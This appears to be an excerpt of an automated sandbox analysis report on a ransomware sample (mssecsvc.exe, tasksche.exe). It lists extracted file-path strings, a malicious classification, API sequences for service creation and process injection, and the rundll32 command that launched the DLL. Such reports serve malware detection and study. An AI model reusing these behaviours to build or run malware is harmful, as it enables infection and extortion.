                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netserv.inf_loc\ra
                Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\volsnap.PNFR07
                Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows~p
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\volmgrx.sys.muip
                Source: mssecsvc.exe.2.drBinary string: C\Device\HarddiskVolume2\Program Files\AVG\UiDll\2623\icudtl.dat.zfsp
                Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Program Files\Windows Defender\MpSvc.dll
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netsstpt.inf_loc
                Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\AMDAGP.SYS.mui
                Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}t$p
                Source: mssecsvc.exe.2.drBinary string: e\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\rdpvideominiport.sys
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\qwavedrv.sys
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\VMBusHID.sys
                Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\drivers\arc.sys
                Source: mssecsvc.exe.2.drBinary string: s\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFilesp
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\asyncmac.sys
                Source: mssecsvc.exe.2.drBinary string: g\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\AVG\AV\cfgall\fixcfg.lockc
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\wmiacpi.sys
                Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\ProgramData\Microsoft\Network\Connections\Pbk
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\AtBroker.exe
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgemc.log
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\0001000F.diroV
                Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe5E
                Source: mssecsvc.exe.2.drBinary string: N\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\SystemRestore
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\hal.inf_loc
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\drivers\mshidkmdf.sysA
                Source: mssecsvc.exe.2.drBinary string: B\Device\HarddiskVolume2\Windows\System32\LocationNotifications.exe\/
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catH
                Source: mssecsvc.exe.2.drBinary string: #\Device\HarddiskVolume2\Windows\infS
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\mrxdav.sysD
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\Prefetch\AVGUI.EXE-77A07B37.pfU0_PPCp
                Source: mssecsvc.exe.2.drBinary string: q\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\BrSerWdm.sys
                Source: mssecsvc.exe.2.drBinary string: z\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\AxInstSv.dll
                Source: mssecsvc.exe.2.drBinary string: g\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\servicing\TrustedInstaller.exeAP7PDC
                Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\VSSVC.exeSU
                Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgidpdrv.log.2H
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cpu.inf_loc
                Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\System32\pots.dllp
                Source: mssecsvc.exe.2.drBinary string: z\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: \\Device\HarddiskVolume2\Windows\System32\ru-RU\microsoft-windows-kernel-power-events.dll.mui
                Source: mssecsvc.exe.2.drBinary string: t\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.inim
                Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exeta
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\dot3svc.dllPN
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\rdpdr.sysw
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\tquery.dll
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\pnrpauto.dll
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\b57nd60x.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\winusb.sysiv
                Source: mssecsvc.exe.2.drBinary string: U\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\gpscript.dll
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\config\systemprofile\Favorites3
                Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\System32\qmgr.dll
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\scfilter.sys
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\upnphost.dll
                Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume2\Program Files\Common Files\AV\avast! Antivirus\userdata.cab0_TS
                Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\hidbatt.sysL
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\IPMIDrv.sysm
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Program Files\Windows Media Player\setup_wm.exe
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\hidbatt.sysL$
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\lpremove.exep
                Source: mssecsvc.exe.2.drBinary string: i\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\fmw1\avgmsgdisp.log.2
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\viaide.systo
                Source: mssecsvc.exe.2.drBinary string: i\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\fmw1\avgmsgdisp.log.3
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\hidbth.sys<\
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\gatherNetworkInfo.vbs1
                Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\IPBusEnum.dll
                Source: mssecsvc.exe.2.drBinary string: P\Device\HarddiskVolume2\Program Files\Common Files\AV\AVG AntiVirus Free EditionU4
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\djsvs.sysD
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\vmbus.sys
                Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume3\$RECYCLE.BIN\S-1-5-21-1870734524-1274666089-2119431859-1000H
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sysA\_^
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\msmouse.PNF H
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vms3cap.sys
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\HpSAMD.sys
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\ru-RU\rascfg.dll.mui
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\amdsata.syso
                Source: mssecsvc.exe.2.drBinary string: U\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\User Profile Service
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avgwsc.exep
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\isapnp.sys
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Autochk
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\wuaueng.dllp
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\BrUsbMdm.sys
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netrass.inf_locjk`GCA
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\IPMIDrv.sys
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\mfplat.dllP3
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\adpu320.sys
                Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\netnwifi.PNF
                Source: mssecsvc.exe.2.drBinary string: .\Device\HarddiskVolume2\Windows\inf\nettun.PNF
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Program Files\Realtek\Audiop
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\hidserv.inf_locp}
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\wersvc.dll
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Users\Public\Desktop\Google Chrome.lnk
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\wimmount.sys
                Source: mssecsvc.exe.2.drBinary string: ?\Device\HarddiskVolume2\Windows\System32\drivers\Synth3dVsc.sys
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\Defrag.exe
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vsmraid.sys
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\ru
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\tdtcp.sys
                Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Windows\Prefetch\AVGUIRNX.EXE-006CD133.pfp
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\inf\netvwififlt.PNFF4
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\aliide.sys
                Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\werconcpl.dll
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\UAGP35.SYSt
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\mstee.sysP
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catPROTp
                Source: mssecsvc.exe.2.drBinary string: D\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\PLA_S
                Source: mssecsvc.exe.2.drBinary string: o\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini_CPU2
                Source: mssecsvc.exe.2.drBinary string: V\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\usbuhci.sysS
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume3\$
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netmscli.inf_locH
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\SyncCenter;PBI
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\mstee.sys
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\NetTrace
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\tdtcp.sys+
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\winusb.sysc
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\usbvideo.inf_loc@"
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\runonce.exe
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netnwifi.inf_loc
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\ndisuio.inf_locKC
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\drivers\filetrace.syst
                Source: mssecsvc.exe.2.drBinary string: C\Device\HarddiskVolume2\Program Files\Internet Explorer\ieproxy.dll
                Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\ProgramData\Avg\AV\cfgall
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\storvsc.sys
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\sfloppy.sysH
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\fveui.dllPR_CPU
                Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\System32\vds.exe
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\VSSVC.exe
                Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaDataI
                Source: mssecsvc.exe.2.drBinary string: T\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\RacRules.xml
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\ndisuio.inf_locp
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\AMDAGP.SYS.pdap
                Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\drivers\fdc.sys
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RUrdd
                Source: mssecsvc.exe.2.drBinary string: y\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\ProgramData\Avg\AV\DB\stats.db\/
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\servicing\TrustedInstaller.exe
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\BrFiltUp.sys
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\processr.sys
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\wmiacpi.sys@A
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\Performance\WinSAT\DataStore
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\ql40xx.sys\
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\SndVol.exep
                Source: mssecsvc.exe.2.drBinary string: \\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Remote Access Hostb
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netmscli.inf_loc
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\nvstor.sys~
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netmscli.inf_locTS4
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\nvstor.sysD
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\lltdsvc.dll
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\WcsPlugInService.dll
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\umbus.inf_loc(
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\TsUsbGD.sys$
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\sdrsvc.dll
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\usbport.inf_loc
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\Utilman.exep
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\VIAAGP.SYS
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~x86~~6.1.7601.17514.catHp
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\msiscsi.sysH
                Source: mssecsvc.exe.2.drBinary string: ?\Device\HarddiskVolume2\Windows\Prefetch\AVGUIX.EXE-D5ECDD53.pfPX
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\lsi_fc.sys
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001p
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002P
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\UAGP35.SYS
                Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\NetworkAccessProtectionPM
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\sffp_sd.syst+
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\machine.inf_loc
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\cmdide.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sys
                Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Users\Public\Desktop\desktop.ini
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\0001000F.wid
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netrast.inf_loc
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\msiscsi.sysh
                Source: mssecsvc.exe.2.drBinary string: Z\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: l\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStoreS
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\lsi_fc.sysX
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\mmsys.cplp
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\umbus.inf_locp
                Source: mssecsvc.exe.2.drBinary string: ~\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0\Icon Files
                Source: classification engineClassification label: mal100.rans.troj.evad.winDLL@18/4@2/2
                Source: C:\Windows\mssecsvc.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
                Source: C:\Windows\mssecsvc.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,6_2_00407C40
                Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,19_2_00401CE8
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,4_2_00408090
                Source: C:\Windows\mssecsvc.exeCode function: 6_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,6_2_00408090
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B005F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification,4_2_00B005F2
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGame
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,4_2_00407CE0
                Source: mssecsvc.exe, 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp, HFKDS6VcNO.dll, mssecsvc.exe.2.drBinary or memory string: 